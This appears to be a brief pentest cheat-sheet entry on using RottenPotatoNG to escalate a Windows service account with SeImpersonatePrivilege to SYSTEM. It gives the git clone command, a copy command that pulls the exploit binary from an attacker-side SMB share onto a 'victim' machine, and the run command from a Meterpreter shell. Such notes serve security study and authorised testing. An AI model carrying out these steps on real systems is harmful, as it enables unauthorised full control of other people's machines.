RottenPotatoNG

Windows privilege escalation technique.

MUST use Meterpreter payload as listener?

• Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
• Potatoes – Windows Privilege Escalation

Use when winPEAS or “whoami /priv” says the the account has “SeImpersonatePrivilege” or equivalent. Usually includes many service accounts in Windows such as the IIS and SQL Server accounts.

Download RottenPotatoNG

Code for RottenPotato is no longer maintained. Use newer implementation as RottenPotatoNG instead. See GitHub.

git clone https://github.com/breenmachine/RottenPotatoNG.git

Upload file to the victim

Use Impacket.

copy \\x.x.x.x\myshare\RottenPotatoNG\RottenPotatoEXE\x64\Release\MSFRottenPotato.exe C:\<some path on victim>\MSFRottenPotato.exe

Execute the exploit

After having a meterpreter shell with incognito mode loaded:

MSFRottenPotato.exe t c:\windows\temp\test.bat